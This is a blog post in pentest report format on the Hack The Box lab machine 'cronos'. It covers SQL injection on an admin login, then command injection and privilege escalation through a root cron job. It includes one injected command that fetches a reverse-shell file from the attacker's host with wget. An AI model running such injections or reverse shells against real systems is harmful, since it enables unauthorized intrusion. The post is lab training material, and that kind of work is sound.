외로운 Nova의 작업실
Report - HTB cronos Report 본문
1. port scan result
| address | port |
| 10.10.10.13 | 22,80,53 |
2. initial access - sql injection
Vulnerability Explanation : admin.cronos.htb web page do not verify input value. so i could inject the sql query, i access admin page. and also, admin.cronos.htb/welcome.php page do not verify input value. i could inject the command query. so, i geted reverse_shell
Vulnerability Fix : always verify user's input
Severity : critical
Steps to reproduce the attack :
screenshot :
8.8.8.8; wget http://10.10.14.8/reverse_shell.php
post-exploitation :
3. privilege escalation
Vulnerability Explanation : there is misconfigure in crontab. this server execute /var/www/laravel/artisan in every minute as root. i changed "artisan" file's content into reverse_shell.php. i geted reverse_shell
Vulnerability Fix : use the Least Privilege
Severity : critical,
Steps to reproduce the attack :
screenshot :
post-exploitation :
'Server Penetesting > Report' 카테고리의 다른 글
| Report - HTB beep (0) | 2023.04.24 |
|---|---|
| Report - Nibbles Report (0) | 2023.04.23 |
| Report - HTB Lame Report (0) | 2023.04.20 |
| Report - HTB bashed Report (0) | 2023.04.17 |
| 리포트 템플릿 (0) | 2023.04.17 |
